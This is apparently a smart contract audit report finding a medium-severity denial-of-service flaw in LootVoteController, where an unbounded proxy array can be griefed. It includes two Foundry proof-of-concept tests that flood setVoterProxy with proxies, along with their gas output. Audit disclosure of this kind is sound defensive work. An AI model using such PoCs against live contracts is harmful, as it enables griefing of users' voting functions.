The github issue page can be found in here
ID | Description | Severity |
M-01 | Unbounded proxy length in LootVoteController can cause function to become unusable. | Medium |
The proxy length in LootVoteController.sol
is unbounded, and the length of proxy is looped in LootVoteController::_clearExpiredProxies
. Each time the function LootVoteController::setVoterProxy
is called, a new proxy will be added to the currentUserProxyVoters
array. If at some point there are now a large number of proxies, iterating over them will become very costly and can result in a gas cost that is over the block gas limit. This will mean that a transaction cannot be executed anymore, causing these functions in a state of DoS.
Looping over unbounded array can result in a state of DoS.
Install foundry.
Rename the original test folder to
and create a new folder nametest
. -
Add forge-std module to lib with command:
git submodule add lib/forge-std
file inVote-Flywheel
folder with the following content:
file within thetest
folder with the following content:
pragma solidity 0.8.20;
import {LootVoteController} from "../LootVoteController.sol";
import {Test, console} from "forge-std/Test.sol";
import {HolyPalPower} from "../HolyPalPower.sol";
contract HolyPaladinToken {
struct UserLock {
// Amount of locked balance
uint128 amount; // safe because PAL max supply is 10M tokens
// Start of the Lock
uint48 startTimestamp;
// Duration of the Lock
uint48 duration;
// BlockNumber for the Lock
uint32 fromBlock; // because we want to search by block number
struct TotalLock {
// Total locked Supply
uint224 total;
// BlockNumber for the last update
uint32 fromBlock;
function getUserLock(address user) external view returns (UserLock memory) {
return UserLock(1,1708151785,604800, 19245756); // DUMMY VALUE AS THIS IS FOR TESTING PURPOSE ONLY.
contract LootVoteControllerTest is Test {
LootVoteController public controller;
address public user;
address public malicious_manager;
address public benign_manager;
HolyPalPower public _hPalPower;
HolyPaladinToken public hPal;
function setUp() public {
hPal = new HolyPaladinToken();
_hPalPower = new HolyPalPower(address(hPal));
user = makeAddr("USER"); // Dummy user for testing.
malicious_manager = makeAddr("MALICIOUS_MANAGER");
benign_manager = makeAddr("BENIGN_MANAGER");
controller = new LootVoteController(address(_hPalPower));
function test_DOSinSetVoterProxy() public {
uint256 WEEK = 604800;
for (uint i; i <= 5000; i++ ) {
controller.setVoterProxy(user, address(uint160(i + 1)), 1, block.timestamp + WEEK);
uint gasBefore = gasleft();
controller.setVoterProxy(user,address(0x666),1,block.timestamp + WEEK);
uint gasAfter = gasleft();
console.log("Gas Used for calling setVoterProxy: ", gasBefore - gasAfter);
- Run the test with command :
forge test --match-test test_DOSinSetVoterProxy -vv
Foundry Result:
Running 1 test for contracts/test/LootVoteController.t.sol:LootVoteControllerTest
[PASS] test_DOSinSetVoterProxy() (gas: 8775765976)
Gas Used for calling setVoterProxy: 3451669
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 74.51s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
mac@macs-MacBook-Pro Vote-Flywheel %
Consider setting a upper bound of proxy that an approved manager can add. Additionally, consider allow users to disapprove previously approved managers in case they try to act maliciously.
I have attached a slightly modified PoC as follows, the PoC below showcased when users delegate himself to a malicious manager, the manager can create a bunch of useless proxies that expired instantly after the startTimestamp
to DoS the user from using setVoterProxy
& clearUserExpiredProxies
in the future as the contract trying to loop through all the expired proxies and remove them 1 by 1 which can be very gas consuming. I think this issue can also be categorised as griefing attack.
pragma solidity 0.8.20;
import {LootVoteController} from "../contracts/LootVoteController.sol";
import {Test, console} from "forge-std/Test.sol";
import {HolyPalPower} from "../contracts/HolyPalPower.sol";
contract HolyPaladinToken {
struct UserLock {
// Amount of locked balance
uint128 amount; // safe because PAL max supply is 10M tokens
// Start of the Lock
uint48 startTimestamp;
// Duration of the Lock
uint48 duration;
// BlockNumber for the Lock
uint32 fromBlock; // because we want to search by block number
struct TotalLock {
// Total locked Supply
uint224 total;
// BlockNumber for the last update
uint32 fromBlock;
function getUserLock(address user) external view returns (UserLock memory) {
return UserLock(1,1708151785,604800, 19245756); // DUMMY VALUE AS THIS IS FOR TESTING PURPOSE ONLY.
contract LootVoteControllerTest is Test {
LootVoteController public controller;
address public user;
address public malicious_manager;
address public benign_manager;
HolyPalPower public _hPalPower;
HolyPaladinToken public hPal;
function setUp() public {
hPal = new HolyPaladinToken();
_hPalPower = new HolyPalPower(address(hPal));
user = makeAddr("USER"); // Dummy user for testing.
malicious_manager = makeAddr("MALICIOUS_MANAGER");
benign_manager = makeAddr("BENIGN_MANAGER");
controller = new LootVoteController(address(_hPalPower));
function test_DOSinSetVoterProxy() public {
uint WEEK = 604800;
uint starttimestamp = 1708151785;
// uint256 userlocktime = ((1708151785 + 604800) / WEEK) * WEEK;
for (uint i; i <= 1000; i++ ) {
controller.setVoterProxy(user, address(uint160(i + 1)), 1, starttimestamp + 1);
vm.warp(starttimestamp + 2);
uint gasBefore = gasleft();
controller.setVoterProxy(user,makeAddr("TEST"),1,block.timestamp + WEEK);
uint gasAfter = gasleft();
console.log("Gas Used for calling setVoterProxy: ", gasBefore - gasAfter);
Foundry Result:
Running 1 test for test/LootVoteController.t.sol:LootVoteControllerTest
[PASS] test_DOSinSetVoterProxy() (gas: 392493638)
Gas Used for calling setVoterProxy: 3844080
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.33s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)